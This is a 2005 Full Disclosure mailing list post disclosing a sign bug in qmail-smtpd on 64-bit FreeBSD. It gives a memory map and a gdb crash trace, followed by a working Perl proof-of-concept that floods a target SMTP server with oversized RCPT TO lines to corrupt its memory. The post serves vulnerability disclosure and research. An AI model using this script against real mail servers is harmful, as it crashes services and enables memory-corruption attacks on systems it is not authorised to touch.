Full Disclosure mailing list archives
Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Mon, 9 May 2005 16:17:34 +0300
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html 3. sign problem in qmail_put/substdio_put
on FreeBSD amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25 21:49:38 UTC 2004 root () fanboy samsco home:/usr/obj/usr/src/sys/GENERIC amd64 the static/heap layout is "better" than linux, so bytecopy(negative) passes and a lot of memory is corrupted: 0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode /var/qmail/bin/qmail-smtpd 0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode /var/qmail/bin/qmail-smtpd 0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap - 0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap - 0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode /libexec/ld-elf.so.1 note memory is contiguous. Program received signal SIGBUS, Bus error. 0x000000020069afb6 in ldexp () from /lib/libc.so.5 (gdb) info stack #0 0x000000020069afb6 in ldexp () from /lib/libc.so.5 #1 0x000000020069b07c in ldexp () from /lib/libc.so.5 #2 0x000000020069b2eb in ldexp () from /lib/libc.so.5 #3 0x000000020069bc6d in ldexp () from /lib/libc.so.5 #4 0x000000020069bd58 in malloc () from /lib/libc.so.5 #5 0x00000000004058aa in alloc (n=1040) at alloc.c:20 #6 0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at alloc_re.c:11 #7 0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897) at stralloc_eady.c:6 #8 0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20 #9 0x00000000004020e1 in main () at qmail-smtpd.c:419 (gdb) x/i $rip 0x20069afb6 <ldexp+1654>: movq $0x2,(%rax,%rsi,8) (gdb) p/x $rax $7 = 0x200837000 (gdb) p/x $rsi $8 = 0x7676767676268 0x50b360: 0x76767676 0x76767676 0x54007676 0x76767676 probably after substdio is corrupted even more fun is possible. --------------------------------------------------------------- #!/usr/bin/perl -w # copyright georgi guninski # cannot be used in vulnerability databases use IO::Socket; my $host=$ARGV[0] || "localhost"; my $port=$ARGV[1] || 25; my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host, PeerPort=>$port) || die("socket"); my $payload="v" x (1024*1024); my $lo2 = "v" x (1024*1024); my $i=0; my $t; print $sock "HELO a\r\n"; print $sock "MAIL FROM: a\r\n"; my $leg = 842; $payload = "v" x $leg; $cou=0; my $vp= "v" x (1024*1024); my $wri = 0; while (42) { print $sock "RCPT TO: ${payload}\r\n"; $t=<$sock>; $cou++; $wri += ($leg + 2); if ($wri > 0x80000010) {last;} if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";} } print $sock "DATA\r\n"; print $sock "where do you want bill gates to go today?\r\n"; print $sock ".\r\n"; while (42) { print $sock "${lo2}"; } while(<$sock>) { print $_; } --------------------------------------------------------------- -- where do you want bill gates to go today? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- 64 bit qmail fun Georgi Guninski (May 06)
- Re: 64 bit qmail fun Lars Olsson (May 06)
- Re: 64 bit qmail fun Georgi Guninski (May 09)
- Re: 64 bit qmail fun Georgi Guninski (May 15)